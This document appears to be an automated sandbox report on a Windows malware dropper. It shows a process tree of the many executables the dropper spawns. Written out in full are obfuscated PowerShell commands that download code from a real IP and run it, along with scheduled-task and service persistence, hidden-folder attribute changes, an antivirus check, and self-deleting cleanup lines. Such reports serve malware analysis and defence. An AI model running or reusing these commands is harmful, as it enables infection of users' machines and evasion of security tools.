PID 636 wrote to memory of 1132	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	pub2.exe
PID 636 wrote to memory of 1132	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	pub2.exe
PID 636 wrote to memory of 2796	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	jamesdirect.exe
PID 636 wrote to memory of 2796	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	jamesdirect.exe
PID 636 wrote to memory of 2796	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	jamesdirect.exe
PID 636 wrote to memory of 3196	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Litever01.exe
PID 636 wrote to memory of 3196	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Litever01.exe
PID 636 wrote to memory of 3196	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Litever01.exe
PID 636 wrote to memory of 2784	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Complete.exe
PID 636 wrote to memory of 2784	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Complete.exe
PID 636 wrote to memory of 2784	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	Complete.exe
PID 636 wrote to memory of 3944	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	md9_1sjm.exe
PID 636 wrote to memory of 3944	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	md9_1sjm.exe
PID 636 wrote to memory of 3944	636	8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe	md9_1sjm.exe
PID 4908 wrote to memory of 3232	4908	Folder.exe	Folder.exe
PID 4908 wrote to memory of 3232	4908	Folder.exe	Folder.exe
PID 4908 wrote to memory of 3232	4908	Folder.exe	Folder.exe
PID 2148 wrote to memory of 684	2148	Install.exe	cmd.exe
PID 2148 wrote to memory of 684	2148	Install.exe	cmd.exe
PID 2148 wrote to memory of 684	2148	Install.exe	cmd.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe
PID 3272 wrote to memory of 3412	3272	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

7032 attrib.exe
6900 attrib.exe

pid	process
7032	attrib.exe
6900	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe
"C:\Users\Admin\AppData\Local\Temp\8e9258148663102f4cd7e0497b59ac9e77a8c701da5bd3582314ba316e2420aa.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:636

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1248

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4744

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:492

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:684

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x40,0x104,0x7ffcdeba46f8,0x7ffcdeba4708,0x7ffcdeba4718
3⤵
PID:4700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
3⤵
PID:3412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
3⤵
PID:632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
3⤵
PID:1244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
3⤵
PID:3612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 /prefetch:8
3⤵
PID:2352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
3⤵
PID:4500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
3⤵
PID:3220

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
PID:6984

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x118,0xf0,0x23c,0xe4,0x7ff78d9e5460,0x7ff78d9e5470,0x7ff78d9e5480
4⤵
PID:3620

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,15729646020039824599,10018456790945915147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8
3⤵
PID:6568

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4908

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:3232

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
PID:4204

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
PID:256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 932
3⤵
- Program crash
PID:4820

C:\Users\Admin\AppData\Local\Temp\cleanpro22.exe
"C:\Users\Admin\AppData\Local\Temp\cleanpro22.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4824

C:\Users\Admin\Documents\0SR5JWjTEs_Q8fnXrBOQ8Eun.exe
"C:\Users\Admin\Documents\0SR5JWjTEs_Q8fnXrBOQ8Eun.exe"
3⤵
PID:3080

C:\Users\Admin\Documents\47DYBs3pNnQgONRycocCsQqA.exe
"C:\Users\Admin\Documents\47DYBs3pNnQgONRycocCsQqA.exe"
3⤵
PID:2768

C:\Users\Admin\Documents\yv9YH0_3Tn4KZQ_YSzADfK61.exe
"C:\Users\Admin\Documents\yv9YH0_3Tn4KZQ_YSzADfK61.exe"
4⤵
PID:5228

C:\Users\Admin\Pictures\Adobe Films\o2Q74sQaeR23MH4PklhpFWXc.exe
"C:\Users\Admin\Pictures\Adobe Films\o2Q74sQaeR23MH4PklhpFWXc.exe"
5⤵
PID:7500

C:\Users\Admin\Pictures\Adobe Films\iL4pINR1jnrP9vOKJO3CmTxq.exe
"C:\Users\Admin\Pictures\Adobe Films\iL4pINR1jnrP9vOKJO3CmTxq.exe"
5⤵
PID:3036

C:\Users\Admin\Pictures\Adobe Films\5W8CtI8f9fUWPY5vOidEvzLM.exe
"C:\Users\Admin\Pictures\Adobe Films\5W8CtI8f9fUWPY5vOidEvzLM.exe"
5⤵
PID:5316

C:\Users\Admin\Pictures\Adobe Films\52MQ3swBkDaP_xpZSEqrQ3Am.exe
"C:\Users\Admin\Pictures\Adobe Films\52MQ3swBkDaP_xpZSEqrQ3Am.exe"
5⤵
PID:7636

C:\Users\Admin\Pictures\Adobe Films\apN3OJNA6fjPWF5_sf7Q_ULj.exe
"C:\Users\Admin\Pictures\Adobe Films\apN3OJNA6fjPWF5_sf7Q_ULj.exe"
5⤵
PID:5580

C:\Users\Admin\Pictures\Adobe Films\i6ogsqMa5E9YMODNzRYaCQX3.exe
"C:\Users\Admin\Pictures\Adobe Films\i6ogsqMa5E9YMODNzRYaCQX3.exe"
5⤵
PID:5348

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:7176

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:7896

C:\Users\Admin\Documents\oGLH0Gol0lEckPV3Vm8U7iVq.exe
"C:\Users\Admin\Documents\oGLH0Gol0lEckPV3Vm8U7iVq.exe"
3⤵
PID:5848

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:5368

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:5280

C:\Users\Admin\Documents\jDTfwML_QO_YynAOs5qEmYWs.exe
"C:\Users\Admin\Documents\jDTfwML_QO_YynAOs5qEmYWs.exe"
3⤵
PID:7160

C:\Users\Admin\AppData\Local\Temp\97f8d528-b034-43fb-a2b2-07bda2d856a3.exe
"C:\Users\Admin\AppData\Local\Temp\97f8d528-b034-43fb-a2b2-07bda2d856a3.exe"
4⤵
PID:7804

C:\Users\Admin\Documents\qbo9S0rwVvkkjyLq4zVfuzO5.exe
"C:\Users\Admin\Documents\qbo9S0rwVvkkjyLq4zVfuzO5.exe"
3⤵
PID:7152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 760
4⤵
- Program crash
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 880
4⤵
- Program crash
PID:488

C:\Users\Admin\Documents\SfxKbwyBMom1Mz9l06Y9HeND.exe
"C:\Users\Admin\Documents\SfxKbwyBMom1Mz9l06Y9HeND.exe"
3⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\7zS39E5.tmp\Install.exe
.\Install.exe
4⤵
PID:1412

C:\Users\Admin\AppData\Local\Temp\7zS87C6.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6776

C:\Users\Admin\Documents\N4o5BLcIMjzSQTXYg5FBnH7k.exe
"C:\Users\Admin\Documents\N4o5BLcIMjzSQTXYg5FBnH7k.exe"
3⤵
PID:1732

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:8028

C:\Users\Admin\Documents\xbA6vuQaxl7eeGWRCKZ0Qrcp.exe
"C:\Users\Admin\Documents\xbA6vuQaxl7eeGWRCKZ0Qrcp.exe"
3⤵
PID:1344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:7396

C:\Windows\system32\mode.com
mode 65,10
5⤵
- Executes dropped EXE
PID:5820

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:6892

C:\Users\Admin\Documents\ojRn3nMvKUjyL5LIo8uTB6LR.exe
"C:\Users\Admin\Documents\ojRn3nMvKUjyL5LIo8uTB6LR.exe"
3⤵
PID:4776

C:\Users\Admin\Documents\ojPb0nK8o3nCcpgpQpndKHbM.exe
"C:\Users\Admin\Documents\ojPb0nK8o3nCcpgpQpndKHbM.exe"
3⤵
PID:6080

C:\Users\Admin\Documents\aSmAY2dkSmq6kbEv_xNramvO.exe
"C:\Users\Admin\Documents\aSmAY2dkSmq6kbEv_xNramvO.exe"
3⤵
PID:5476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xpvwewxm.exe" C:\Windows\SysWOW64\rimuzga\
4⤵
PID:7140

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config rimuzga binPath= "C:\Windows\SysWOW64\rimuzga\xpvwewxm.exe /d\"C:\Users\Admin\Documents\aSmAY2dkSmq6kbEv_xNramvO.exe\""
4⤵
PID:888

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start rimuzga
4⤵
PID:7740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8656.bat" "
4⤵
PID:5888

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:2208

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:7932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 1316
4⤵
- Program crash
PID:4740

C:\Users\Admin\Documents\6ZZQeGte3gqjTekQPA7TWMBj.exe
"C:\Users\Admin\Documents\6ZZQeGte3gqjTekQPA7TWMBj.exe"
3⤵
PID:3712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:6532

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:8096

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:6504

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:5184

C:\Users\Admin\Documents\GTX5vX4rhuDzssZCthoJpfqP.exe
"C:\Users\Admin\Documents\GTX5vX4rhuDzssZCthoJpfqP.exe"
3⤵
PID:5080

C:\Users\Admin\Documents\Xnw1rn0Hl_I99moBO_jTCefx.exe
"C:\Users\Admin\Documents\Xnw1rn0Hl_I99moBO_jTCefx.exe"
3⤵
PID:1424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Xnw1rn0Hl_I99moBO_jTCefx.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Xnw1rn0Hl_I99moBO_jTCefx.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:4508

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Xnw1rn0Hl_I99moBO_jTCefx.exe /f
5⤵
- Kills process with taskkill
PID:4044

C:\Users\Admin\Documents\eBRKfPEyTQ5tlSsLNza7uEF4.exe
"C:\Users\Admin\Documents\eBRKfPEyTQ5tlSsLNza7uEF4.exe"
3⤵
PID:6312

C:\Users\Admin\Documents\s_70RdhwDgwLY6LiCQ81yLhq.exe
"C:\Users\Admin\Documents\s_70RdhwDgwLY6LiCQ81yLhq.exe"
3⤵
PID:6900

C:\Users\Admin\Documents\jz4NV8OnzsfwgiR2CO6AaTzF.exe
"C:\Users\Admin\Documents\jz4NV8OnzsfwgiR2CO6AaTzF.exe"
3⤵
PID:1604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:7220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:7464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:7356

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:7568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
5⤵
PID:6732

C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
6⤵
- Views/modifies file attributes
PID:6900

C:\Users\Admin\Documents\AyesvqqY46jsIV03RxPvMRrP.exe
"C:\Users\Admin\Documents\AyesvqqY46jsIV03RxPvMRrP.exe"
3⤵
PID:7088

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1132

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:3088

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
- Executes dropped EXE
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 488
4⤵
- Program crash
PID:3652

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:3156

C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
3⤵
PID:1676

C:\Users\Admin\AppData\Local\Temp\Litever01.exe
"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3196

C:\Users\Admin\AppData\Local\Temp\Complete.exe
"C:\Users\Admin\AppData\Local\Temp\Complete.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2784

C:\Users\Admin\Documents\MXD1z9v0pEKswXEHe4nqpPIu.exe
"C:\Users\Admin\Documents\MXD1z9v0pEKswXEHe4nqpPIu.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2000

C:\Users\Admin\Documents\lNj0jGwyo9_tN37Pz3d4Z9UJ.exe
"C:\Users\Admin\Documents\lNj0jGwyo9_tN37Pz3d4Z9UJ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im lNj0jGwyo9_tN37Pz3d4Z9UJ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\lNj0jGwyo9_tN37Pz3d4Z9UJ.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:6448

C:\Windows\SysWOW64\taskkill.exe
taskkill /im lNj0jGwyo9_tN37Pz3d4Z9UJ.exe /f
5⤵
- Kills process with taskkill
PID:7344

C:\Users\Admin\Documents\yr_hm5gby5gpy7c7GLG_Anwm.exe
"C:\Users\Admin\Documents\yr_hm5gby5gpy7c7GLG_Anwm.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:5360

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:740

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:6932

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:2384

C:\Users\Admin\Documents\pTpSDv3NGGQZU6Md8zwJAh1s.exe
"C:\Users\Admin\Documents\pTpSDv3NGGQZU6Md8zwJAh1s.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
